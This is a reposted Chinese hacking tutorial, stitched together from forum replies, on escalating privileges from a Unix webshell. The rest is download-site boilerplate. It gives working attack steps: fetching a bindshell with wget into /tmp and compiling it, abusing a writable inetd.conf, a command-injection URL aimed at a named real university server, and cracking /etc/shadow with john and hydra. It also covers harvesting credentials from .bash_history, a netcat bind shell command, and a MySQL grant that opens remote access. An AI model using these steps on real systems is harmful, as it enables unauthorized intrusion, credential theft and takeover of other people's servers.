unix的webshell权限提升方法
大部分技巧来源于我家学究天人的eong大大
用wget把bindshell下载到/tmp/目录下
或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
然后用gcc编译
_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls -al" rel=nofollow>http://cgiserver.sogang.ac.kr/~gsvi…ilename=rb9.txt|ls -al|
ls -al显示文件
||中间的是显示的命令
很简单的办法是得到用户
1。我是说用hydra猜测密码,思路混乱的时候打成john跑shadow了。你可能有疑问,有了shell,为什么还要跑普通用户的密码(root经常是不能登陆的)。主要是为了查看.bash_history和其他资料,以及获取一个能够通过ssh/ftp/telnet 登陆的账号。也要考虑到proftpd_0day 之类的是需要一个能够正常登陆的账号的。没有这个webshell我也不会跑了,因为我连用户名(/etc/passwd)都不知道。.bash_history很可能已经包括了你所需要的user/pass.例如mysql的,还包括了管理员通常会访问的其他服务器。当然不是所有机器的访问限制都那么严格。/home对nobody来说也是经常可读的。可是我们必须考虑所有情况。
2。如果你所知道的所有的vul都被补上了,面对所有的suid你都无能为力的时候。也许通过一个可以su -的账号你可以骗出root权限。
3。对于我个人来说,用john跑shadow是为了完善我自己的密码/密码规则库。
4。我从来没有把netcat和pipe 结合一起使用过,没有经验。也请你指教一下。
To blackfox:
搜索suid是有必要的,原因嘛。。不单纯是为了exploit一个suid程序,也反映了管理员的安全意识层次嘛。当然也许这年头还会有suidshell的存在。
exec`nc -l -n -p 60000 -e /bin/sh`
nc下载地址:http://www.leftworld.net/download/show?id=316.html
mysql的ip禁止连接的打开方法:
find / -name my.cnf -print
mysql> grant all on *.* to username@IP identified by 'password';
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » unix的webshell权限提升方法
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
